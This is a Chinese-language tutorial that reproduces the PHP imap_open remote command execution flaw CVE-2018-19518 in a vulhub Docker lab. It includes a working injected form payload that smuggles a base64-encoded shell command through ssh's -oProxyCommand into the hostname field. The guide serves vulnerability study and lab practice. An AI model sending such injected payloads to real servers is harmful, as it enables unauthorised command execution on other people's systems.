PHP--远程命令执行漏洞CVE-2018-19518复现
目录
- 漏洞介绍
- 漏洞复现
- 进入容器
- 移除环境
漏洞介绍
-php imap扩展用户在php中执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令。
-debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等。
-ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行漏洞。
-ProxyCommand用来指定连接到服务器的命令. 其可以是任何的命令,只要能从其标准输入读入数据,然后写出到标准输出即可. 这条命令需要连接到sshd服务器上。
漏洞复现
首先进入环境,最好在root权限下进行
cd vulhub/php/CVE-2018-19518
然后我们进入到该目录下使用docker启动
docker-compose build
docker-compose up -d
然后我们访问该ip的8080端口,出现一个登陆界面,这里我们随意输入,准备采取抓包
使用burp进行抓包,并发送到Repeater里
然后我们修改数据包,添加一段执行代码
例如 echo ‘Hello’>/tmp/test,对它进行base64编码
ZWNobyAYSGVsbG8ZPi90bXAvdGVzdA==
这里-oProxyCommand 表示使用该参数。
%09后添加上面进行base64编码后的内容,再将部分内容进行url编码。
hostname=x+-oProxyCommand%3decho%09ZWNobyAnSGVsbG8nPi90bXAvdGVzdA%3d%3d|base64%09-d|sh}&username=111&password=222
点击send发送数据包以后,我们准备进入虚拟机查看是否创建成功
进入容器
这里我们进入容器查看刚才文件是否创建成功,先查询id
docker ps -a
查看容器id后在下面命令中输入id进入
docker exec -it ID /bin/bash
进入到tmp目录下查看文件
cd /tmp
ls -al
cat test
这里我们可以发现刚刚test文件创建成功
移除环境
做完实验以后先不要关闭当前界面,移除环境关闭镜像。
docker-compose down
# 关闭正在运行的容器,删除所有相关的容器,移除NAT(docker-compose在运行的时候会创建一个NAT网段)
PHP--远程命令执行漏洞CVE-2018-19518复现相关推荐
- cmd命令不识别exp_Struts2 S2061 远程命令执行漏洞(CVE202017530)复现
漏洞简介 Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架.Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(C ...
- flexpaper php 代码,FlexPaper 2.3.6 远程命令执行漏洞 附Exp
影响版本:小于FlexPaper 2.3.6的所有版本 FlexPaper (https://www.flowpaper.com) 是一个开源项目,遵循GPL协议,在互联网上非常流行.它为web客户端 ...
- webmin远程命令执行漏洞(cve-2019-15107)深入分析
漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...
- 【注意】关于Redis存在远程命令执行漏洞的安全公告
点击蓝色"程序猿DD"关注我 回复"资源"获取独家整理的学习资料! 来源:CNVD漏洞平台 安全公告编号:CNTA-2019-0024 2019年7月10日,国 ...
- rmi远程反序列化rce漏洞_Oracle WebLogic 反序列化远程命令执行漏洞预警
报告编号:B6-2019-041901 报告来源:360-CERT 报告作者:360-CERT 更新日期:2019-04-19 0x00 事件背景 2019年4月17日,国家信息安全漏洞共享平台(CN ...
- jenkins java反序列化_Jenkins “Java 反序列化”过程远程命令执行漏洞
###漏洞原理 反序列化是指特定语言中将传递的对象序列化数据重新恢复为实例对象的过程,而在这个过程中会执行一系列的字节流解析和对象实例化操作用于恢复之前序列化时的对象.在原博文所提到的那些 Java ...
- ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞
ThinkPHP 5.0.x.5.1.x.5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速.兼容而且简单的轻量级国产PHP开发框架.借鉴Struts框架的Action对象,同 ...
- 远程执行漏洞修复方案_请马上修复!SaltStack远程命令执行漏洞
[漏洞预警]SaltStack远程命令执行漏洞(CVE-2020-11651.CVE-2020-11652) 2020年5月3日,阿里云应急响应中心监测到近日国外某安全团队披露了SaltStack存在 ...
- 又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析
本文讲的是又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析, 早在2015年,FireEye曾发布过两次关于Office的Encapsulated PostScript (EPS)图形文 ...
- 详述WebLogic反序列化远程命令执行漏洞的处理过程,云和恩墨技术通讯精选
各位亲爱的用户/读者朋友们: 为了及时共享行业案例,通告共性问题,达成知识共享和提前预防,我们整理和编辑了<云和恩墨技术通讯>(5月刊),通过对过去一段时间的知识回顾和故障归纳,以期提供有 ...
最新文章
- CSS display 属性
- Linux系统\Centos没有网卡eth0配置文件怎么办?
- java项目设计_java项目设计
- 图论--拓扑排序--判断一个图能否被拓扑排序
- 2016蓝桥杯省赛---java---B---7(剪邮票)
- OpenKruise - 云原生应用自动化引擎正式开源
- 什么是PXE及PXE作用
- 本科毕业设计(论文)格式最详细总结
- 教你如何使用github+jsDelivr搭建免费图床
- Android笔记:使用Glide加载图片刷新时会闪烁
- ip-guard文档加密后无小锁标志
- R语言数据可视化之数据分布图(直方图、密度曲线、箱线图、等高线、2D密度图)...
- 【深度学习】Hinton 最新研究:神经网络的未来是前向-前向算法
- Linux中什么命令显示vi缩写,Linux命令(八)——vi编辑器的使用
- pandas文件读取与存储
- 微信小程序—微信小程序端支付代码
- JAVASCRIPT 正则表达式学习--基础与零宽断言(转自司徒正美)
- esp32通过74HC595控制16个LED灯
- ABAP选择结构自己做的练习题
- nvm安装和配置(npm下载失败的原因以及解决方法)